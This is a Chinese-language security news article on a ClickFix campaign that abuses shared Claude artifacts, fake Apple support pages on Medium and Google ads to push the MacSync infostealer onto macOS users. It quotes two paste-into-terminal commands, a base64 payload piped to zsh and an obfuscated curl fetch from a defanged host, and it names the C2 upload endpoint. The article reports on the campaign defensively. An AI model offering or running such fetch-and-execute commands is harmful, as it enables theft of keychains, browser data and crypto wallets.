恶意分子正借助 Claude 共享内容与谷歌广告发起 ClickFix 攻击，向搜索特定关键词的 macOS 用户分发信息窃取类恶意软件。研究人员已在野外发现至少两种攻击变体，超过 1 万名用户访问过包含危险指令的恶意内容。 

Claude 共享内容（Claude artifact）是指由用户通过 Anthropic 大语言模型生成并公开的内容，形式包括指令、教程、代码片段等。这类内容独立于主对话界面，任何人都可通过 claude.ai 域名下的链接直接访问。 

该类页面会提示用户：所展示内容由用户生成，未经准确性验证。

研究人员发现，在谷歌搜索中，" 在线 DNS 解析器 ""macOS 命令行磁盘空间分析工具 ""HomeBrew" 等关键词均出现了恶意推广结果。

恶意 HomeBrew 搜索结果

这些搜索结果会跳转到公开的 Claude 共享内容，或冒充苹果官方支持的 Medium 文章。两种页面都会诱导用户在终端中粘贴并执行 Shell 命令。 

第一种攻击变体诱导执行的命令为：

echo   "..."   |   base64   -D   |   zsh

第二种为：

true   &&   cur""l   -SsLfk   --compressed   "https://raxelpak [ . ] com/curl/ [ hash ] "   |   zsh

第二种攻击变体使用伪造苹果支持页面

研究人员发现，该恶意 Claude 教程页面浏览量已至少达到 15600 次，这一数据可大致反映受骗用户规模。根据几天前观测到的该页面显示，浏览量为 12300 次。

Claude 对话中托管的 ClickFix 攻击引导页面

在终端执行上述命令后，系统会下载一个 MacSync 信息窃取木马的加载器，用于窃取设备上的敏感数据。

研究人员表示，该木马使用硬编码令牌与 API 密钥连接命令与控制（C2）基础设施，并伪造 macOS 浏览器 UA 以伪装成正常流量。 

命令执行结果会直接传递给 osascript，由 AppleScript 负责执行实际的窃取行为，包括钥匙串、浏览器数据、加密货币钱包等信息。"  

窃取的数据会打包为 /tmp/osalogging.zip，通过 HTTP POST 请求上传至攻击者 C2 服务器 a2abotnet [ . ] com/gate。若传输失败，压缩包会被拆分为多个小块并重试 8 次。上传成功后，程序会执行清理操作，抹除所有痕迹。 

两种攻击变体均从同一 C2 地址下载第二阶段载荷，表明背后是同一威胁组织所为。 此前已有类似攻击活动利用 ChatGPT、Grok 的对话分享功能分发 AMOS 信息窃取木马。2025 年 12 月，研究人员就发现攻击者利用 ChatGPT 与 Grok 对话分享链接，针对 macOS 用户发动 ClickFix 攻击。 

此次攻击开始滥用 Claude，表明大模型滥用已扩散至更多主流平台。安全研究人员提醒用户保持谨慎，不要在终端执行来源不明或无法完全理解的命令。而在同一对话中向聊天机器人询问命令是否安全，是简单有效的判断方法。